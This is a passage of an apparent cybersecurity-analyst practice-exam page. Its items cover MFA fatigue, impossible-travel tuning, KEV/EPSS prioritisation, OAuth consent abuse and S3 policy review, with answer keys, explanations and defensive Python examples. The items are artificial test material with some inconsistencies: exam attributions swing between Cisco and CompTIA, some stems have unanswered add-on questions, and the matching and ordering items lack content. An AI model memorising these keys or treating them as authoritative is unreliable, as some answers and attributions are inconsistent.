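Assumptions: FIELD_MAPS and SAMPLE_LINES are constructed; the target field
names are ECS-style but the mapping is illustrative, not a vendor's own.
"""
import json
from collections import Counter

REQUIRED = {"source.ip", "user.name", "event.action"}

# Per-source map: vendor field name -> normalized field name.
FIELD_MAPS = {
    "cloud_a": {"srcIp": "source.ip", "userName": "user.name", "apiCall": "event.action"},
    "cloud_b": {"client_address": "source.ip", "actor": "user.name", "operation": "event.action"},
}

# Constructed JSON-lines input; the last line is missing its action field.
SAMPLE_LINES = """\
{"source": "cloud_a", "srcIp": "198.51.100.7", "userName": "alice", "apiCall": "CreateAccessKey"}
{"source": "cloud_b", "client_address": "198.51.100.7", "actor": "alice", "operation": "CreateAccessKey"}
{"source": "cloud_b", "client_address": "203.0.113.10", "actor": "bob", "operation": "GetObject"}
{"source": "cloud_b", "client_address": "203.0.113.10", "actor": "bob"}
"""


def normalize(raw):
    """Map one raw event onto the shared schema; return (event, missing_fields)."""
    source = raw["source"]
    mapping = FIELD_MAPS[source]
    event = {"event.source": source}
    for vendor_field, value in raw.items():
        if vendor_field in mapping:
            event[mapping[vendor_field]] = value
    missing = sorted(REQUIRED - event.keys())
    return event, missing


def normalize_lines(text):
    """Normalize JSON lines; return (good_events, rejected) so gaps are visible."""
    good, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        event, missing = normalize(json.loads(line))
        if missing:
            rejected.append({"raw": line, "missing": missing})
        else:
            good.append(event)
    return good, rejected


def sensitive_actions_by_user(events, sensitive=("CreateAccessKey", "PutUserPolicy")):
    """One analytic over normalized fields, independent of which cloud emitted them."""
    counts = Counter()
    for e in events:
        if e["event.action"] in sensitive:
            counts[(e["user.name"], e["source.ip"])] += 1
    return dict(counts)


if __name__ == "__main__":
    good, rejected = normalize_lines(SAMPLE_LINES)
    print(sensitive_actions_by_user(good))
    print("rejected:", rejected)
```

Before the mapping step, the same user's activity from the two sources would sit under different keys (`userName` vs `actor`) and never correlate; after it, the analytic counts both events against one identity, and the rejected record shows exactly which field the parser still needs.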

343
MCQhard

A business owner accepts delayed remediation for a production system. What must the report include? If the primary audience is a legal/privacy stakeholder, which content choice is most appropriate?

A.No mention of the accepted risk
B.Only the analyst's personal opinion
C.Risk owner, reason, compensating controls, review date, and expiry
D.A permanent exception with no review
AnswerC

Risk acceptance must be accountable, time-bound, and visible. The report should be tuned to the legal/privacy stakeholder while preserving factual accuracy.

Why this answer

Option C is correct because when a business owner accepts delayed remediation for a production system, the report must formally document the risk acceptance. This includes the risk owner, the reason for accepting the risk, any compensating controls in place, a review date to reassess the risk, and an expiry date for the acceptance. For a legal/privacy stakeholder, this documentation provides an auditable trail that demonstrates due diligence and compliance with regulatory requirements, such as GDPR or HIPAA.

Exam trap

Cisco often tests the misconception that a risk acceptance report can simply note the decision without detailing the compensating controls or expiry, leading candidates to choose an incomplete answer that omits critical audit trail elements.

How to eliminate wrong answers

Option A is wrong because omitting the accepted risk from the report would violate audit and compliance standards; legal/privacy stakeholders require full disclosure of all risks to assess liability and regulatory exposure. Option B is wrong because including only the analyst's personal opinion is subjective and lacks the objective, verifiable data needed for legal and privacy review; such opinions are not defensible in an audit or legal proceeding.

344
Matchingmedium

Match each regulatory framework to its focus.


Concepts
Matches

Data privacy in EU

Payment card security

Healthcare data protection

Financial reporting controls

Federal information security

Why these pairings

Compliance frameworks are essential for governance.

345
MCQmedium

A user receives repeated MFA prompts and eventually approves one they did not initiate. How should the analyst classify this behaviour?

A.Password spraying only
B.MFA fatigue or push-bombing attack
C.DNS tunnelling
D.SSL certificate expiry
AnswerB

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

Repeated MFA prompts that the user eventually approves out of frustration or habit are the hallmark of MFA fatigue (also called push-bombing). The attacker sends a flood of push notifications to the user's device, hoping the user will mistakenly approve one to stop the annoyance. This bypasses the MFA control without needing to compromise the second factor.

Exam trap

Cisco often tests the distinction between 'MFA fatigue' and 'password spraying' — candidates mistakenly choose password spraying because they focus on the repeated attempts, but the key is that the attacker already has the password and is abusing the MFA approval process, not guessing passwords.

How to eliminate wrong answers

Option A is wrong because password spraying involves trying a few common passwords against many accounts, not targeting a single user with repeated MFA prompts. Option C is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2, not to overwhelm a user with MFA approval requests.

346
Multi-Selecthard

A SIEM correlation rule for impossible travel is creating noise from VPN users. Which refinements should improve fidelity? (Choose two.)

Select 2 answers
A.Disable all identity alerts
B.Require a second signal such as new device, failed MFA, or mailbox rule creation
C.Add trusted VPN egress ranges as named/known locations
D.Treat every VPN login as malicious
AnswersB, C

Combining identity anomalies reduces false positives.

Why this answer

Option B is correct because requiring a second signal—such as a new device, failed MFA, or mailbox rule creation—adds an additional layer of verification that helps confirm the user's identity and intent. This reduces false positives from VPN users whose IP addresses may change rapidly, as the SIEM can now correlate the impossible travel event with other suspicious activities that indicate a genuine compromise rather than a legitimate VPN connection.

Exam trap

Cisco often tests the misconception that disabling identity alerts is a valid refinement, but this would eliminate all identity-based detection, whereas the correct approach is to add context (trusted ranges and secondary signals) to reduce noise without losing detection capability.
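Both refinements from answers B and C, as an added example that is not part of the page: consecutive logins per user are compared by great-circle speed, pairs touching a named VPN egress range are suppressed, and an implausible hop only becomes an alert when a second signal (new device, failed MFA, or a mailbox rule creation) is present. The coordinates attached to each login stand in for a GeoIP lookup; the egress range, the 900 km/h cut-off and the sample logins are constructed values.

```python
"""Impossible-travel rule with known locations and a second signal (added example).

Assumptions: logins already carry coordinates for their IP (GeoIP is outside
this example); TRUSTED_VPN_EGRESS, MAX_PLAUSIBLE_KMH and SAMPLE_LOGINS are
constructed, using RFC 5737 documentation addresses.
"""
import ipaddress
import math
from datetime import datetime

TRUSTED_VPN_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]  # constructed named location
MAX_PLAUSIBLE_KMH = 900  # roughly airliner speed; faster than this is "impossible"

SAMPLE_LOGINS = [  # constructed
    # alice: office, then the corporate VPN egress (which geolocates far away)
    {"user": "alice", "ts": "2024-01-10T10:00:00", "ip": "198.51.100.5", "lat": 40.71, "lon": -74.01, "device": "L1", "mfa_failed": False, "mailbox_rule": False},
    {"user": "alice", "ts": "2024-01-10T10:30:00", "ip": "203.0.113.20", "lat": 50.11, "lon": 8.68, "device": "L1", "mfa_failed": False, "mailbox_rule": False},
    # bob: impossible hop plus a new device and a failed MFA
    {"user": "bob", "ts": "2024-01-10T10:00:00", "ip": "198.51.100.6", "lat": 40.71, "lon": -74.01, "device": "W1", "mfa_failed": False, "mailbox_rule": False},
    {"user": "bob", "ts": "2024-01-10T10:20:00", "ip": "192.0.2.9", "lat": 35.68, "lon": 139.69, "device": "unknown-browser", "mfa_failed": True, "mailbox_rule": False},
    # carol: a long flight's worth of time between logins
    {"user": "carol", "ts": "2024-01-10T09:00:00", "ip": "198.51.100.8", "lat": 40.71, "lon": -74.01, "device": "C1", "mfa_failed": False, "mailbox_rule": False},
    {"user": "carol", "ts": "2024-01-10T17:00:00", "ip": "192.0.2.30", "lat": 51.51, "lon": -0.13, "device": "C1", "mfa_failed": False, "mailbox_rule": False},
    # dave: impossible hop but nothing else corroborates it
    {"user": "dave", "ts": "2024-01-10T10:00:00", "ip": "198.51.100.9", "lat": 40.71, "lon": -74.01, "device": "D1", "mfa_failed": False, "mailbox_rule": False},
    {"user": "dave", "ts": "2024-01-10T10:15:00", "ip": "192.0.2.10", "lat": -33.87, "lon": 151.21, "device": "D1", "mfa_failed": False, "mailbox_rule": False},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def is_known_location(ip):
    """True when the address falls inside a named/trusted egress range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_VPN_EGRESS)


def evaluate(logins):
    """Return one verdict per consecutive login pair for each user."""
    verdicts, by_user = [], {}
    for e in logins:
        by_user.setdefault(e["user"], []).append(e)
    for user, events in by_user.items():
        events.sort(key=lambda e: e["ts"])
        seen_devices = {events[0]["device"]}
        for prev, cur in zip(events, events[1:]):
            hours = (datetime.fromisoformat(cur["ts"]) - datetime.fromisoformat(prev["ts"])).total_seconds() / 3600
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            speed = km / max(hours, 1 / 3600)  # guard against identical timestamps
            second_signal = cur["device"] not in seen_devices or cur["mfa_failed"] or cur["mailbox_rule"]
            seen_devices.add(cur["device"])
            if is_known_location(prev["ip"]) or is_known_location(cur["ip"]):
                verdict = "suppressed-known-location"
            elif speed <= MAX_PLAUSIBLE_KMH:
                verdict = "plausible"
            elif second_signal:
                verdict = "alert"
            else:
                verdict = "impossible-no-second-signal"
            verdicts.append({"user": user, "speed_kmh": round(speed), "verdict": verdict})
    return verdicts


if __name__ == "__main__":
    for v in evaluate(SAMPLE_LOGINS):
        print(v)
```

The two refinements act at different stages: the named-location check removes the VPN noise before any distance is computed, and the second-signal requirement keeps an unexplained impossible hop (dave) visible at lower confidence instead of firing a full alert on speed alone.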

347
Multi-Selecthard

A security analyst is prioritizing vulnerabilities from a scan. Which TWO factors should be considered to determine the remediation priority? (Select TWO)

Select 2 answers
A.Exploit code availability
B.Vendor patch availability
C.Number of affected systems
D.CVSS base score
E.Age of the vulnerability
AnswersA, C

Public exploits increase the urgency for remediation.

Why this answer

Exploit code availability is a critical factor because if working exploit code is publicly available, the vulnerability is far more likely to be actively exploited, increasing the risk and urgency for remediation. This directly impacts the likelihood of a breach, making it a key priority driver beyond just the CVSS score.

Exam trap

Cisco often tests the misconception that CVSS base score alone determines priority, but the exam emphasizes that exploit availability and asset criticality (here, number of affected systems) are more actionable for remediation prioritization.

348
MCQeasy

A security analyst notices a single external IP address attempting to log in to multiple user accounts on the company's VPN server over the past hour. All attempts have failed. What should the analyst do FIRST?

A.Block the IP address at the firewall.
B.Notify law enforcement.
C.Verify the logs and escalate to the incident response team.
D.Disable the VPN server.
AnswerC

Verifying logs confirms the incident, and escalation ensures proper handling.

Why this answer

Option C is correct because the first step in incident response is to verify the logs to confirm the activity is not a false positive (e.g., a misconfigured client or legitimate brute-force testing) and then escalate to the incident response team for coordinated action. This aligns with the NIST SP 800-61 incident response lifecycle, where identification and validation precede containment. Blocking or disabling without verification could disrupt legitimate access or destroy forensic evidence.

Exam trap

CompTIA often tests the candidate's ability to resist the urge to immediately contain or notify external parties; the trap here is choosing a reactive containment step (blocking or disabling) before performing the critical validation and escalation step required by the incident response framework.

How to eliminate wrong answers

Option A is wrong because blocking the IP at the firewall without first verifying the logs may be premature; the IP could be a shared NAT address or a false positive, and blocking it could prevent further analysis or alert the attacker. Option B is wrong because law enforcement is typically notified only after the incident is confirmed, scoped, and deemed criminal in nature; notifying them as a first step wastes resources and may violate chain-of-custody procedures. Option D is wrong because disabling the entire VPN server is an extreme containment measure that would deny service to all legitimate users and should only be considered after verification and as part of a coordinated incident response plan.

349
Drag & Dropmedium

Order the steps for setting up a SIEM (Security Information and Event Management) system.

Why this order

SIEM setup includes installation, log source configuration, rule definition, log onboarding, and dashboard creation.

350
Multi-Selectmedium

Which findings should be included when reporting remediation performance to asset owners? (Choose two.)

Select 2 answers
A.Recently remediated findings awaiting validation
B.Every raw scanner debug line
C.Unrelated physical-access badge failures
D.Open critical findings past SLA by owner
AnswersA, D

This shows work completed but not yet verified.

Why this answer

Recently remediated findings awaiting validation are a critical metric for asset owners because they confirm that remediation actions have been taken and are pending verification. This aligns with the vulnerability management lifecycle, where validation ensures the fix was applied correctly and no residual risk remains. Including this status in reports provides asset owners with actionable insight into the progress of remediation efforts and any outstanding steps needed to close the finding.

Exam trap

Cisco often tests the distinction between operational data (e.g., raw scanner logs) and actionable remediation metrics, tempting candidates to select overly detailed or irrelevant information instead of the concise, status-driven data that asset owners need.

351
MCQhard

A vulnerability report has 900 findings. One medium CVSS vulnerability is listed in CISA KEV and has high EPSS; several high CVSS issues are not exploitable in the environment. What should the analyst recommend? For validation, which action should be taken before closing or downgrading the finding?

A.Remediate alphabetically by CVE ID
B.Prioritize the KEV/high-EPSS issue after confirming asset exposure
C.Always sort only by CVSS base score
D.Remediate only vulnerabilities with vendor logos in the report
AnswerB

Known exploitation and likelihood can outweigh base CVSS in risk-based prioritization.

Why this answer

Option B is correct because the CISA KEV vulnerability with high EPSS indicates active exploitation in the wild, making it a critical threat regardless of its medium CVSS base score. Prioritizing it after confirming asset exposure ensures the organization addresses the most imminent risk first, as high CVSS issues that are not exploitable in the environment pose no actual danger. This aligns with risk-based vulnerability management, where exploitability and threat intelligence (KEV, EPSS) override raw severity scores.

Exam trap

Cisco often tests the misconception that CVSS base score alone determines priority, but the trap here is that real-world risk assessment must incorporate threat intelligence (KEV, EPSS) and environmental context (exploitability) to avoid wasting resources on non-exploitable high-severity issues.

How to eliminate wrong answers

Option A is wrong because remediating alphabetically by CVE ID ignores all risk factors, such as exploitability, asset exposure, and threat intelligence, leading to inefficient and potentially dangerous prioritization. Option C is wrong because sorting only by CVSS base score neglects environmental context (e.g., non-exploitable high CVSS issues) and active exploitation indicators (KEV, EPSS), which are critical for effective vulnerability management.
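The risk-based ordering behind this answer and question 347, as an added example that is not part of the page: findings are tiered by KEV membership, EPSS and confirmed exposure before CVSS is consulted as a tie-breaker, and a separate gate refuses to downgrade or close a finding until a recorded exposure check exists. The CVE identifiers are placeholders (`CVE-0000-000N`), the 0.5 EPSS cut-off is illustrative, and `exposed` is assumed to be the result of an environment-specific exploitability check already performed.

```python
"""Risk-based vulnerability prioritization with a validation gate (added example).

Assumptions: SAMPLE_FINDINGS and HIGH_EPSS are constructed; "exposed" means
the asset-exposure check for this environment has already been done.
"""

HIGH_EPSS = 0.5  # constructed threshold for "likely to be exploited"

SAMPLE_FINDINGS = [  # constructed; CVE ids are placeholders
    {"cve": "CVE-0000-0001", "cvss": 5.5, "epss": 0.92, "kev": True,  "exposed": True,  "hosts": 3},
    {"cve": "CVE-0000-0002", "cvss": 9.8, "epss": 0.05, "kev": False, "exposed": False, "hosts": 40},
    {"cve": "CVE-0000-0003", "cvss": 8.1, "epss": 0.60, "kev": False, "exposed": True,  "hosts": 12},
    {"cve": "CVE-0000-0004", "cvss": 7.5, "epss": 0.02, "kev": False, "exposed": True,  "hosts": 200},
]


def tier(finding):
    """0 = known exploited and reachable, 1 = likely exploited and reachable,
    2 = reachable, 3 = not exploitable in this environment (any CVSS)."""
    if not finding["exposed"]:
        return 3
    if finding["kev"]:
        return 0
    if finding["epss"] >= HIGH_EPSS:
        return 1
    return 2


def priority_key(finding):
    # Lower sorts first: tier, then EPSS, CVSS and blast radius as tie-breakers.
    return (tier(finding), -finding["epss"], -finding["cvss"], -finding["hosts"])


def prioritize(findings):
    """Return findings in remediation order."""
    return sorted(findings, key=priority_key)


def downgrade_allowed(finding, validation):
    """Gate before closing or downgrading: requires a recorded check that the
    vulnerable component is unreachable or absent, not merely a low score.
    `validation` is a constructed record such as {"checked": True, "reachable": False}."""
    return bool(validation.get("checked")) and validation.get("reachable") is False


if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        print(tier(f), f["cve"], "cvss", f["cvss"], "epss", f["epss"], "kev", f["kev"])
    print(downgrade_allowed(SAMPLE_FINDINGS[1], {"checked": True, "reachable": False}))
```

With this key the medium-severity KEV item sorts first and the 9.8 that is not exploitable here sorts last, matching the answer; `downgrade_allowed` is the validation step the second half of the question asks about, and it deliberately ignores the CVSS value altogether.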

352
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Delete historical flow records to reduce SIEM cost
B.Assume encryption means the transfer is safe
C.Correlate flow volume with database audit logs and the destination reputation
D.Disable all outbound internet access for the organisation
AnswerC

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option C is correct because correlating the flow volume with database audit logs allows the analyst to identify which specific records or queries were accessed during the anomalous transfers, while checking the destination reputation helps determine if the unfamiliar AS is known for data exfiltration or is a legitimate service. This combination directly addresses the suspicious behavior—large encrypted outbound transfers during off-hours—by linking network evidence to host-based logs, which is essential for triaging a potential data breach. Without this correlation, the analyst cannot distinguish between a legitimate backup or replication job and malicious exfiltration.

Exam trap

Cisco often tests the misconception that encryption implies trustworthiness, but the trap here is that encrypted traffic can still be malicious, and the correct triage step is to correlate network flows with host-based logs and external reputation data rather than assuming safety or destroying evidence.

How to eliminate wrong answers

Option A is wrong because deleting historical flow records destroys forensic evidence and violates data retention policies (e.g., PCI DSS, GDPR), and it does not address the triage need to investigate the suspicious activity. Option B is wrong because encryption does not guarantee safety; attackers commonly use TLS/SSL to exfiltrate data covertly, and the encryption itself is a red flag when combined with off-hours transfers to an unfamiliar AS.

353
MCQeasy

A third-party provider caused an outage during remediation. What should the communication to the vendor focus on? If the primary audience is a SOC manager, which content choice is most appropriate?

A.A public press statement draft first
B.Confidential unrelated customer data
C.Timeline, service impact, evidence, required corrective actions, and contractual follow-up
D.Internal blame speculation
AnswerC

Vendor communications should be factual and tied to obligations and remediation. The report should be tuned to the SOC manager while preserving factual accuracy.

Why this answer

Option C is correct because when a third-party vendor causes an outage during remediation, the communication must focus on operational and contractual details: the exact timeline of the outage, the scope of service impact (e.g., number of users affected, systems down), evidence (e.g., logs, monitoring alerts), required corrective actions to prevent recurrence, and contractual follow-up (e.g., SLA breach, penalties). This aligns with the SOC manager's need for actionable, factual data to manage incident response and vendor accountability, not public relations or unrelated data.

Exam trap

Cisco often tests the distinction between internal operational communication (for SOC managers) and external/public communication (for PR or legal), so candidates mistakenly choose a press statement or irrelevant data instead of the structured incident details required for vendor accountability.

How to eliminate wrong answers

Option A is wrong because a public press statement draft is premature and inappropriate for internal communication to a SOC manager; the primary audience needs technical and operational details, not public messaging. Option B is wrong because sharing confidential unrelated customer data violates data privacy regulations (e.g., GDPR, HIPAA) and is irrelevant to the vendor-caused outage; the communication must focus on the incident itself, not exposing other customer information.

354
MCQmedium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Assume encryption means the transfer is safe
B.Delete historical flow records to reduce SIEM cost
C.Disable all outbound internet access for the organisation
D.Correlate flow volume with database audit logs and the destination reputation
AnswerD

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating the flow volume with database audit logs allows the analyst to verify if the outbound transfers correspond to legitimate database queries or exports, while checking the destination reputation helps determine if the autonomous system is known for malicious activity. This combination provides the clearest triage value by directly linking the network anomaly to potential data exfiltration or a compromised database server, without prematurely disrupting operations or ignoring the encryption indicator.

Exam trap

The trap here is that candidates assume encryption (option A) guarantees safety, but Cisco tests the understanding that encryption can be used to conceal malicious activity, and the correct triage step is to correlate with other logs and threat intelligence rather than making assumptions based on encryption alone.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; in fact, encrypted outbound transfers during off-hours to an unfamiliar AS are a classic indicator of data exfiltration (e.g., using TLS to hide stolen data). Option B is wrong because deleting historical flow records destroys forensic evidence and violates retention policies (e.g., PCI DSS, GDPR), and it does not help triage the current alert. Option C is wrong because disabling all outbound internet access is an overly drastic response that would disrupt legitimate business operations and is not a triage step; it should only be considered after analysis confirms a threat.
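The correlation step that questions 352 and 354 both describe, as an added example that is not part of the page: each large flow from the database server is joined to audit-log entries within a short time window, checked against the destination's ASN familiarity and a reputation lookup, and given a verdict that separates an off-hours bulk export to an unfamiliar AS from a known replication job. The flow records, audit entries, ASN list, reputation table, byte threshold and join window are all constructed for this example.

```python
"""Join database-server flows to audit logs and destination context (added example).

Assumptions: SAMPLE_FLOWS, SAMPLE_AUDIT, KNOWN_ASNS, INTERNAL_REPLICA and
REPUTATION are constructed; thresholds and the 15-minute window are illustrative.
"""
from datetime import datetime, timedelta

BUSINESS_HOURS = (8, 18)            # local hours treated as on-hours (constructed)
LARGE_TRANSFER_BYTES = 500_000_000  # 500 MB (constructed)
BULK_ROWS = 1_000_000               # audit rows that count as a bulk export (constructed)
JOIN_WINDOW = timedelta(minutes=15)

# Constructed flow records from the database server 10.0.5.20.
SAMPLE_FLOWS = [
    {"ts": "2024-01-10T02:10:00", "src": "10.0.5.20", "dst": "198.51.100.77", "dport": 443, "bytes": 2_400_000_000, "asn": 64500},
    {"ts": "2024-01-10T03:00:00", "src": "10.0.5.20", "dst": "10.0.9.4", "dport": 5432, "bytes": 3_100_000_000, "asn": None},
    {"ts": "2024-01-10T11:00:00", "src": "10.0.5.20", "dst": "203.0.113.8", "dport": 443, "bytes": 120_000, "asn": 64496},
]

# Constructed database audit entries: who ran what, when, and how many rows.
SAMPLE_AUDIT = [
    {"ts": "2024-01-10T02:04:30", "user": "svc_report", "stmt": "COPY customers TO STDOUT", "rows": 8_500_000},
    {"ts": "2024-01-10T02:58:00", "user": "replicator", "stmt": "START_REPLICATION", "rows": 0},
    {"ts": "2024-01-10T11:00:10", "user": "app", "stmt": "SELECT ... LIMIT 50", "rows": 50},
]

# Constructed organisational context and a stand-in for a reputation service.
KNOWN_ASNS = {64496}                  # e.g. the monitoring SaaS vendor's AS
INTERNAL_REPLICA = {"10.0.9.4"}
REPUTATION = {"198.51.100.77": "unknown-hosting"}


def is_off_hours(ts):
    hour = datetime.fromisoformat(ts).hour
    return not (BUSINESS_HOURS[0] <= hour < BUSINESS_HOURS[1])


def audit_events_near(flow, audit):
    """Audit entries whose timestamp lies within JOIN_WINDOW of the flow."""
    t = datetime.fromisoformat(flow["ts"])
    return [a for a in audit if abs(datetime.fromisoformat(a["ts"]) - t) <= JOIN_WINDOW]


def triage_flow(flow, audit):
    """Return a verdict for one flow together with the evidence it rests on."""
    base = {"dst": flow["dst"], "reputation": REPUTATION.get(flow["dst"], "no-data")}
    if flow["bytes"] < LARGE_TRANSFER_BYTES:
        return {**base, "verdict": "below-threshold", "evidence": []}
    nearby = audit_events_near(flow, audit)
    bulk = [a for a in nearby if a["rows"] >= BULK_ROWS or a["stmt"].startswith("COPY")]
    if flow["dst"] in INTERNAL_REPLICA and any(a["stmt"] == "START_REPLICATION" for a in nearby):
        return {**base, "verdict": "expected-replication", "evidence": nearby}
    unfamiliar = flow["asn"] not in KNOWN_ASNS
    if is_off_hours(flow["ts"]) and unfamiliar and bulk:
        return {**base, "verdict": "escalate-possible-exfiltration", "evidence": bulk}
    return {**base, "verdict": "review", "evidence": nearby}


def triage_all(flows, audit):
    return [triage_flow(f, audit) for f in flows]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_FLOWS, SAMPLE_AUDIT):
        print(r["dst"], r["verdict"], r["reputation"], [e["user"] for e in r["evidence"]])
```

Neither data source decides the case alone: the flow says only that a lot of bytes left; the audit log names the account and statement behind them, and the ASN/reputation context says whether the destination is one the organisation already trusts. The escalation verdict requires all three, which is the "correlate" answer the question wants.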

355
MCQhard

During a post-compromise review, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? Which action should be prioritized before closure?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth consent grant to stop the attacker's access, then review the mailbox for any data exfiltration or rules created, and finally identify other users who may have consented to the same app to contain the incident. This follows the NIST SP 800-61 incident response process for detection and analysis, ensuring the threat is neutralized and scope is understood before moving to eradication and recovery.

Exam trap

CompTIA often tests the misconception that MFA or password resets are sufficient to revoke OAuth app access, but the trap is that OAuth tokens are independent of the user's authentication factor and require explicit grant revocation.

How to eliminate wrong answers

Option A is wrong because MFA does not protect against OAuth consent phishing; once the user grants permissions, the app has a token that bypasses MFA entirely. Option B is wrong because deleting all emails destroys forensic evidence and does not address the root cause—the attacker still retains access via the OAuth grant. Option C is wrong because resetting the Windows password does not invalidate the OAuth refresh token; the app can continue to access the mailbox using its own stored tokens.

356
MCQhard

Refer to the exhibit. A security analyst is reviewing an S3 bucket policy in AWS. What is the primary security misconfiguration?

A.The bucket policy grants anonymous read access to all objects.
B.The bucket policy allows all actions.
C.The bucket policy does not require encryption.
D.The bucket policy uses an outdated version.
AnswerA

Principal: '*' means anyone, including anonymous users, can read objects.

Why this answer

The bucket policy includes a principal of '*' without any condition restricting access to authenticated users, which grants anonymous (unauthenticated) read access to all objects in the S3 bucket. This violates the principle of least privilege and exposes data to anyone on the internet, making it the primary security misconfiguration.

Exam trap

CompTIA often tests the distinction between a policy that allows 'all actions' versus one that allows 'read access' but with a public principal, tricking candidates into focusing on the action scope rather than the identity granting anonymous access.

How to eliminate wrong answers

Option B is wrong because while the policy allows 's3:GetObject' (not all actions), the core issue is the anonymous principal, not the action scope. Option C is wrong because the policy does not explicitly require encryption, but that is a secondary concern; the primary misconfiguration is the public access grant. Option D is wrong because the policy version (2012-10-17) is current and not outdated; the version field is a syntax requirement, not a security control.
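The check an analyst would apply to the policy in the (missing) exhibit, as an added example that is not part of the page: a small static audit of an S3 bucket policy document that reports an `Allow` statement whose principal is anonymous (`"*"` or `{"AWS": "*"}`), distinguishes the case where a `Condition` narrows it, and separately flags wildcard actions. Both policies below are constructed for the example; the account id `111111111111` and the role name are placeholders.

```python
"""Static audit of an S3 bucket policy for an anonymous principal (added example).

Assumptions: PUBLIC_POLICY and HARDENED_POLICY are constructed (the page's
exhibit is not available); the account id and role name are placeholders.
"""
import json

PUBLIC_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PublicRead",
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"
  }]
}""")

HARDENED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "ReportReaderOnly",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111111111111:role/ReportReader"},
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"
  }]
}""")


def _as_list(value):
    """Policy fields may be a scalar or a list; treat both uniformly."""
    return value if isinstance(value, list) else [value]


def principal_is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} (also "*" inside a list of AWS principals)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def audit_policy(policy):
    """Return a list of (Sid, issue) tuples; an empty list means no finding."""
    issues = []
    for st in _as_list(policy.get("Statement", [])):
        sid = st.get("Sid", "<no-sid>")
        if st.get("Effect") != "Allow":
            continue  # Deny statements cannot grant anonymous access
        if principal_is_anonymous(st.get("Principal")):
            issue = ("anonymous-principal-conditioned" if "Condition" in st
                     else "anonymous-principal-without-condition")
            issues.append((sid, issue))
        if any(a in ("*", "s3:*") for a in _as_list(st.get("Action", []))):
            issues.append((sid, "wildcard-action"))
    return issues


if __name__ == "__main__":
    print("public  :", audit_policy(PUBLIC_POLICY))
    print("hardened:", audit_policy(HARDENED_POLICY))
```

The audit keeps the two questions the exam trap conflates separate: `wildcard-action` is about scope, and the finding on `PublicRead` comes from the principal alone even though the action is only `s3:GetObject`. The `Version` value is read but never judged, matching the page's note that it is syntax rather than a control.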

357
Multi-Selecthard

A legal hold is issued during an investigation. Which actions support it? (Choose two.)

Select 2 answers
A.Preserve relevant logs, mailboxes, images, and tickets
B.Let each team decide informally what to delete
C.Purge audit logs to save storage
D.Suspend routine deletion for in-scope evidence
AnswersA, D

Potential evidence must be retained.

Why this answer

A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. This action directly supports the hold by preventing spoliation and ensuring compliance with discovery obligations.

Exam trap

Cisco often tests the misconception that cost-saving measures (like purging logs) are acceptable during a legal hold, when in fact any deletion—even for legitimate storage management—violates the preservation requirement and can be considered spoliation.

358
MCQmedium

A server team needs to fix an OpenSSL vulnerability across Linux hosts. What should the technical remediation section include? If the primary audience is a technical remediation owner, which content choice is most appropriate?

A.Only a red/yellow/green chart
B.Only the CVE headline
C.Affected assets, package versions, patch commands or vendor guidance, validation method, and rollback notes
D.Only estimated financial loss
AnswerC

Technical teams need precise, actionable remediation steps and a way to confirm success. The report should be tuned to the technical remediation owner while preserving factual accuracy.

Why this answer

Option C is correct because a technical remediation section must provide actionable steps for the remediation owner. This includes identifying affected assets and package versions, specifying patch commands or vendor guidance, outlining a validation method to confirm the fix, and including rollback notes in case the patch causes issues. Without these details, the remediation owner cannot execute the fix reliably or verify its success.

Exam trap

Cisco often tests the distinction between reporting to executives (which uses summary charts) and providing technical remediation details to the remediation owner, leading candidates to mistakenly choose a high-level summary like a chart or CVE headline instead of the actionable, step-by-step content required for the technical audience.

How to eliminate wrong answers

Option A is wrong because a red/yellow/green chart is a status summary for executive reporting, not a technical remediation plan; it lacks the specific commands, versions, and validation steps needed to fix an OpenSSL vulnerability. Option B is wrong because only the CVE headline (e.g., CVE-2024-XXXX) provides no actionable information; the remediation owner needs affected package versions, patch commands, and rollback procedures, not just a vulnerability identifier. Option D is wrong because an estimated financial loss figure belongs in the risk or executive summary; it tells the remediation owner nothing about which hosts to patch, to what version, or how to verify the fix.
